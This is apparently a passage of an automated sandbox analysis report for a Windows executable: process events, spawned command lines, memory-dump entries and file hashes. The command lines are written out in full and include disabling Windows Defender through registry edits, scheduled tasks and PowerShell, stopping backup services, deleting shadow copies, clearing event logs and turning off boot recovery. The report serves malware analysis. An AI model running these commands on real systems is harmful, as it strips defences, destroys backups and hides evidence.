PID 1084 wrote to memory of 736 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1084 wrote to memory of 736 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1084 wrote to memory of 736 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1928 wrote to memory of 964 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\sc.exe
PID 1928 wrote to memory of 964 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\sc.exe
PID 1928 wrote to memory of 964 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\sc.exe
PID 1928 wrote to memory of 1196 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\sc.exe
PID 1928 wrote to memory of 1196 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\sc.exe
PID 1928 wrote to memory of 1196 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\sc.exe
PID 1928 wrote to memory of 1900 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\sc.exe
PID 1928 wrote to memory of 1900 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\sc.exe
PID 1928 wrote to memory of 1900 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\sc.exe
PID 1928 wrote to memory of 1712 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\sc.exe
PID 1928 wrote to memory of 1712 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\sc.exe
PID 1928 wrote to memory of 1712 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\sc.exe
PID 1928 wrote to memory of 1020 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\sc.exe
PID 1928 wrote to memory of 1020 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\sc.exe
PID 1928 wrote to memory of 1020 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\sc.exe
PID 1928 wrote to memory of 1924 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\sc.exe

Processes

C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe

"C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe"

C:\Windows\system32\net.exe

net.exe stop "NetMsmqActivator" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "NetMsmqActivator" /y

C:\Windows\system32\net.exe

net.exe stop "SamSs" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SamSs" /y

C:\Windows\system32\net.exe

net.exe stop "SDRSVC" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SDRSVC" /y

C:\Windows\system32\net.exe

net.exe stop "SstpSvc" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SstpSvc" /y

C:\Windows\system32\net.exe

net.exe stop "UI0Detect" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "UI0Detect" /y

C:\Windows\system32\net.exe

net.exe stop "VSS" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "VSS" /y

C:\Windows\system32\net.exe

net.exe stop "wbengine" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "wbengine" /y

C:\Windows\system32\net.exe

net.exe stop "WebClient" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "WebClient" /y

C:\Windows\system32\sc.exe

sc.exe config "NetMsmqActivator" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "SamSs" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "SDRSVC" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "SstpSvc" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "UI0Detect" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "VSS" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "wbengine" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "WebClient" start= disabled

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\system32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl system

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl security

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl application

C:\Windows\System32\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\System32\Wbem\wmic.exe

wmic.exe shadowcopy delete

C:\Windows\system32\bcdedit.exe

bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\bcdedit.exe

bcdedit.exe /set {default} recoveryenabled no

C:\Windows\system32\cmd.exe

cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Program Files\Windows Defender\MpCmdRun.exe

"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Windows\system32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\system32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableRealtimeMonitoring $true

Network

N/A

Files

memory/1984-54-0x0000000000000000-mapping.dmp

memory/524-55-0x0000000000000000-mapping.dmp

memory/472-56-0x0000000000000000-mapping.dmp

memory/1416-57-0x0000000000000000-mapping.dmp

memory/1464-58-0x0000000000000000-mapping.dmp

memory/1396-59-0x0000000000000000-mapping.dmp

memory/540-60-0x0000000000000000-mapping.dmp

memory/1752-61-0x0000000000000000-mapping.dmp

memory/1508-62-0x0000000000000000-mapping.dmp

memory/620-63-0x0000000000000000-mapping.dmp

memory/2028-64-0x0000000000000000-mapping.dmp

memory/2044-65-0x0000000000000000-mapping.dmp

memory/1048-66-0x0000000000000000-mapping.dmp

memory/1968-67-0x0000000000000000-mapping.dmp

memory/1084-68-0x0000000000000000-mapping.dmp

memory/736-69-0x0000000000000000-mapping.dmp

memory/964-70-0x0000000000000000-mapping.dmp

memory/1196-71-0x0000000000000000-mapping.dmp

memory/1900-72-0x0000000000000000-mapping.dmp

memory/1712-73-0x0000000000000000-mapping.dmp

memory/1020-74-0x0000000000000000-mapping.dmp

memory/1924-75-0x0000000000000000-mapping.dmp

memory/1704-76-0x0000000000000000-mapping.dmp

memory/1600-77-0x0000000000000000-mapping.dmp

memory/376-78-0x0000000000000000-mapping.dmp

memory/108-79-0x0000000000000000-mapping.dmp

memory/516-80-0x0000000000000000-mapping.dmp

memory/1632-81-0x0000000000000000-mapping.dmp

memory/1764-82-0x0000000000000000-mapping.dmp

memory/620-83-0x0000000000000000-mapping.dmp

memory/2032-84-0x0000000000000000-mapping.dmp

memory/1852-85-0x0000000000000000-mapping.dmp

memory/1120-86-0x0000000000000000-mapping.dmp

memory/1548-87-0x0000000000000000-mapping.dmp

memory/2012-88-0x0000000000000000-mapping.dmp

memory/1736-89-0x0000000000000000-mapping.dmp

memory/556-90-0x0000000000000000-mapping.dmp

memory/888-91-0x0000000000000000-mapping.dmp

memory/1976-92-0x0000000000000000-mapping.dmp

memory/1684-93-0x0000000000000000-mapping.dmp

memory/792-94-0x0000000000000000-mapping.dmp

memory/1404-95-0x0000000000000000-mapping.dmp

memory/1992-96-0x0000000000000000-mapping.dmp

memory/1052-97-0x0000000000000000-mapping.dmp

memory/1624-98-0x0000000000000000-mapping.dmp

memory/1176-99-0x0000000000000000-mapping.dmp

memory/1688-100-0x0000000000000000-mapping.dmp

memory/1188-101-0x0000000000000000-mapping.dmp

memory/1660-102-0x0000000000000000-mapping.dmp

memory/968-103-0x0000000000000000-mapping.dmp

memory/1416-104-0x0000000000000000-mapping.dmp

memory/1104-105-0x0000000000000000-mapping.dmp

memory/436-106-0x0000000000000000-mapping.dmp

memory/1540-107-0x0000000000000000-mapping.dmp

memory/676-108-0x0000000000000000-mapping.dmp

memory/1748-109-0x0000000000000000-mapping.dmp

memory/1696-110-0x0000000000000000-mapping.dmp

memory/816-111-0x0000000000000000-mapping.dmp

memory/2000-112-0x0000000000000000-mapping.dmp

memory/2000-113-0x000007FEFC151000-0x000007FEFC153000-memory.dmp

memory/1948-114-0x0000000000000000-mapping.dmp

memory/524-116-0x0000000000000000-mapping.dmp

memory/832-118-0x0000000000000000-mapping.dmp

memory/1616-119-0x0000000000000000-mapping.dmp

memory/2060-120-0x0000000000000000-mapping.dmp

memory/2156-122-0x000007FEF3360000-0x000007FEF3EBD000-memory.dmp

memory/2156-124-0x00000000025F2000-0x00000000025F4000-memory.dmp

memory/2156-123-0x00000000025F0000-0x00000000025F2000-memory.dmp

memory/2156-125-0x00000000025F4000-0x00000000025F7000-memory.dmp

memory/2156-126-0x000000001B720000-0x000000001BA1F000-memory.dmp

memory/2156-127-0x00000000025FB000-0x000000000261A000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 8fef5645ac7250580d23b10c8a777ffc
SHA1 cd3aa2da88aa658ba0c48e707c89f242bcec5043
SHA256 fd0c3e62f5e616e4f1b62faada33ff626e3f7f646e814a4b1675abb1068585f1
SHA512 3de2c2c044bd529872deac4052ec4d5fa4d3f108cb9250c94a4b1e32f03730ff3d8eca426f6be6c5582d4b63ca428c3e002247af61039248709c615aaf4a2c8e

memory/2248-130-0x000007FEF29C0000-0x000007FEF351D000-memory.dmp

memory/2248-131-0x000000001B8C0000-0x000000001BBBF000-memory.dmp

memory/2248-135-0x0000000002204000-0x0000000002207000-memory.dmp

memory/2248-134-0x0000000002202000-0x0000000002204000-memory.dmp

memory/2248-133-0x000000000220B000-0x000000000222A000-memory.dmp

memory/2248-132-0x0000000002200000-0x0000000002202000-memory.dmp